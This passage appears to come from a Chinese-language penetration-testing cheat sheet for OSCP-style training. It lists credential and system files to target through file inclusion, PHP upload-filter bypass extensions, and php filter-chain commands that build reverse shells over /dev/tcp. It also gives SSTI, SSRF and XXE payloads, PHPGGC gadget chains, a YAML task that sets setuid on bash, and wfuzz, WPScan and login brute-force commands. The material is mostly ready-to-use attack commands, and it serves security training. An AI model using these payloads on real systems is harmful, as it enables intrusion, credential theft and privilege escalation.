/proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat /proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php /var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history ~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession ``` ##### Windows 文件 ``` C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log ``` #### PDF PHP Inclusion 创建一个包含 PDF 标头的文件,其中包含 PHP 代码。 ``` %PDF-1.4 ``` ``` http:///index.php?page=uploads/.pdf%00&cmd=whoami ``` #### PHP 上传过滤器绕过 ``` .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .phtml .phtm .php%00.jpeg ``` ``` .php%20 .php%0d%0a.jpg .php%0a .php.jpg .php%00.gif .php\x00.gif .php%00.png .php\x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg ``` #### PHP 过滤器链生成器 ``` python3 php_filter_chain_generator.py --chain '' python3 php_filter_chain_generator.py --chain '' python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>' python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>' python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" ``` ``` http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4 ``` ``` python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg) php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0= ``` ``` python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" | grep "^php" > ``` ``` curl "http:///index.php?file=$(cat )" ``` #### PHP 通用 Gadget 链 (PHPGGC) ``` phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt ``` #### 服务端请求伪造 (SSRF) ``` https:///item/2?server=server./file?id=9&x= ``` #### 服务端模板注入 (SSTI) ##### Fuzz 字符串 ``` ${{<%[%'"}}%\. ``` ##### Magic Payload ``` {{ ‘’.__class__.__mro__[1].__subclasses__() }} ``` #### 上传漏洞 ``` ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution SVG: Stored XSS / Server-Side Request Forgery GIF: Stored XSS CSV: CSV Injection XML: XXE AVI: Local File Inclusion / Server-Side request Forgery HTML/JS: HTML Injection / XSS / Open Redirect PNG / JPEG: Pixel Flood Attack ZIP: Remote Code Exection via Local File Inclusion PDF / PPTX: Server-Side Request Forgery / Blind XXE ``` #### wfuzz ``` wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http:///FUZZ/.php --hc '403,404' ``` ##### 写入文件 ``` wfuzz -w /PATH/TO/WORDLIST -c -f -u http:// --hc 403,404 ``` ##### 自定义扫描,限制输出 ``` wfuzz -w /PATH/TO/WORDLIST -u http:///dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20 ``` ##### 同时 Fuzzing 两个参数 ``` wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://://FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c ``` ##### 域名 ``` wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.' -u http:/// ``` ##### 子域名 ``` wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." --hc 200 --hw 356 -t 100 ``` ##### Git ``` wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http:///FUZZ --hc 403,404 ``` ##### 登录 ``` wfuzz -X POST -u "http://:/login.php" -d "email=FUZZ&password=" -w /PATH/TO/WORDLIST/ --hc 200 -c wfuzz -X POST -u "http://:/login.php" -d "username=FUZZ&password=" -w /PATH/TO/WORDLIST/ --ss "Invalid login" ``` ##### SQL ``` wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http:///select http ``` ##### DNS ``` wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ." --filter "r.headers.response~'Access-Control-Allow-Origin'" http:/// wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100 wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ." -u http:// --hw -t 100 ``` ##### 编号文件 ``` wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip ``` ##### 枚举 PID ``` wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000 ``` #### WPScan ``` wpscan --url https:// --enumerate u,t,p wpscan --url https:// --plugins-detection aggressive wpscan --url https:// --disable-tls-checks wpscan --url https:// --disable-tls-checks --enumerate u,t,p wpscan --url http:// -U -P passwords.txt -t 50 ``` #### XML 外部实体 (XXE) ##### 骨架 Payload 请求 ``` GET / HTTP/1.1 Host: : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 136 :80/shell.php" >]> &xxe; ``` ##### Payloads ``` ]> &passwd;1 ``` ``` ]>3&test;
17th Estate, CA
 ``` ``` username=%26username%3b&version=1.0.0-->+]> ``` #### 恶意 YAML ``` - hosts: localhost tasks: - name: badyml command: chmod +s /bin/bash ``` ### 字典列表 #### Bash ##### 将数字添加到密码段 ``` for i in {1..100}; do printf "Password@%d\n" $i >> ; done ``` #### CeWL ``` cewl -d 0 -m 5 -w http:///index.php --lowercase cewl -d 5 -m 3 -w http:///index.php --with-numbers ``` #### CUPP ``` ./cupp -i ``` #### crunch ``` crunch 9 9 -t foobar%%% > wordlist.txt crunch 5 5 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ -o .txt ``` #### JavaScript 快速字典列表 ``` javascript:(function(){const e=document.documentElement.innerText.match(/[a-zA-Z_\-]+/g),n=[...new Set(e)].sort();document.open(),document.write(n.join("
")),document.close();})(); ``` #### 变异字典列表 ##### 查找空密码 ``` grep -n '^$' /PATH/TO/WORDLIST/ ``` ##### 删除所有数字序列 ``` head /PATH/TO/WORDLIST/ > .txt sed -i '/^1/d' .txt ``` #### Username Anarchy ``` ./username-anarchy -f first,first.last,last,flast,f.last -i ```
标签:ADCS, AI合规, Cheat Sheet, CSV导出, CTI, Libemu, LinPEAS, Linux提权, OffSec, OSCP, OSCP+, Shadow Credentials, UML, Web报告查看器, Windows提权, 命令速查, 域渗透, 威胁模拟, 安全认证, 实战演练, 应用安全, 提权, 数据展示, 日志审计, 模拟器, 电子数据取证, 红队, 网络安全, 逆向工具, 隐私保护